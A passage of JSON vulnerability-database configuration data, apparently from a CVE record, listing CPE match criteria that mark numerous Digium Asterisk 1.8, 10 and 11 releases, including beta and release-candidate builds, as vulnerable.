              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "82423EC2-FA29-4AF6-86C3-6AC6DFDC4DC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B8B5E76-4A74-4E88-8A6F-C23538B7642A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "447E07C9-4A25-418D-B53F-609B78EE4C21",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D9D7D88-D64F-4F54-8C84-6AC45FBD36F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F67AB282-591C-4ED7-9750-C593A38D5D7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C9F8F881-2BF7-44AB-8756-54A06801EB11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "36EFF3C4-4D00-4BC5-94B9-403BB00C6AB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5E434F10-395E-426E-A988-4CDA504577D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BA564F7-7A69-4805-8C8C-C2EB5E12A6E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF6FA464-F9D3-4674-844B-A2B2E2C42A51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "44722C8B-BB37-4444-A58A-F01D0B3B4DDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4FABFDB-D99A-4F83-8FEE-3BFA36BA4061",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A842E112-8974-4E74-AD56-1DEF5B5DD9F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9ACBC01-8A9D-43A5-A825-1CC9670417A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61E7199F-EACE-431A-8ADD-B96A6FCDBC49",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA7CD0E5-8E69-43B5-A5FF-8B122475CC00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F4BEA1B2-2103-4E25-92A9-DB107D6D4AD5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2AD9AFFB-F903-43DD-9C1D-4D8E83EA25C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687ED3CE-67C4-410D-8AF4-C769015598F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "30E918CD-89C4-42DA-9709-E50E0A3FA736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "DA57FA15-D0D7-4A97-9C25-6F6566940098",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1C45300-A2CF-40E7-AB67-23DC24C31A1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "958081DC-1D77-45CD-A940-C7A1AB42C7BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "298A879D-4F65-4523-A752-D17C4F81B822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "37AB07BE-54C4-4972-A05F-D1E2CF4363CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EBC63564-A84E-463D-8312-DDF1C6B7796F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "62A0906E-B631-4F3A-9ABC-9A43A43220BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C6314ADA-2849-416D-966E-C01C322EF904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8B6CB1DD-614A-4B3D-99AE-9B1341427024",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC95B04F-3746-4F1C-8428-A1FA10253E14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "20819080-E0AB-4879-B4CF-A154D6F7EF6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6C45753-E2CC-4F7C-B8DA-3D8CF255EA22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5A080197-D6AA-4FDC-888E-51D1C8251E34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "1F08D930-D4C1-4C63-875C-171C46AE97C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AA43D7D-AEAD-47CB-BFA5-B73004A1A7A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "B5ED5F6F-166D-4610-8939-A33AD45F1ADE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D40002A-564E-425C-BA2A-7C4A8F8DAFD7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "521C4DB2-7127-4BA9-94FC-AB0E9E06FE2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8C905DC1-8AB8-4D83-BB5B-FA4DABC58229",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "ECC74B5D-97A1-46FF-AFA3-5D5E4A0BF3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2D98C7C-94A8-4348-AF22-04A41FB6F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "85D39A99-E9A6-4860-BC61-56CA2FC3238B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "845DA0A4-1983-4E82-99C8-B7FBF47C632E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5A63FBB7-F1CF-4603-848F-980742D2ED36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "10B2084F-3AF4-4008-899C-6C1E43715201",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "217C13A5-9F8A-4392-858F-2FC88B03EB0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B282462-900C-492E-98DE-65364E62F5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687784F0-9ACC-435D-81F9-1E1B0F61010C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9D7D020C-FE32-408B-BE37-58835FD3D95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "39B7938F-7370-4F67-B0CD-1C14DE2E4E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC587195-5973-423B-8BF9-3E0B27363B76",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.2:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "E65E012A-49B6-4796-B1FA-A83C9248D0EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FBE5780-D503-46D1-BE04-4CB7B662B5DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "9F4C24B7-22E3-4E56-9B9F-414101B627FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CB19323D-208F-45F9-85F3-BAA5D1BC3AA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "09334CAB-9ADB-49BB-BE83-BBAC6A7A9F47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DC6DEEF5-7277-4E38-9233-E3612CD77CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1813B898-F957-40D7-AF9A-064FB57D5C82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "75A0D613-3D04-4902-9707-E743F30CF1A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "C5D07DB0-7C6A-4490-8FD0-DC83568E0421",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54AB61A7-E143-4BEC-8658-68FF615B007E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F5552D1C-C05A-4B67-A025-BBD3022C7B9A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B7F8B72-EEC9-4021-B320-8CB6E83856F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38A0F946-6A51-4E4D-8E8A-CA6DF222289F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9C7619B8-B986-4B24-BFFD-956A1A6780FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "21CF339A-A38B-40CE-9811-A6CE77B29025",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "13856847-32A8-401D-A6DC-8DB96AE739FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C8E8F4ED-AA7B-4B19-8416-6BC0608C760D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "B7A900B2-0F3C-450E-8933-BDD5C9627EA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0992625B-012F-40EA-9A20-6352E633F62B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E3828876-DDB4-457D-8E50-43A4FF761005",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79283554-AF08-44DC-BF98-446C47AA490A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "52B5F73C-174A-4A0B-8D14-EC10779FC884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "54EBFD0B-686F-477F-8FF2-535F24A3348B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0961F130-FF8C-41C2-BF2E-9731ED9EB73B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9789FC49-DE20-4477-B9D5-12CB71F42E58",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5234531C-F69A-4B94-A480-147734206C5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "321C1066-6800-4488-A7C4-BE91FF738453",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A3FE6DC-17FD-4CEE-BDFB-9D4685640381",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
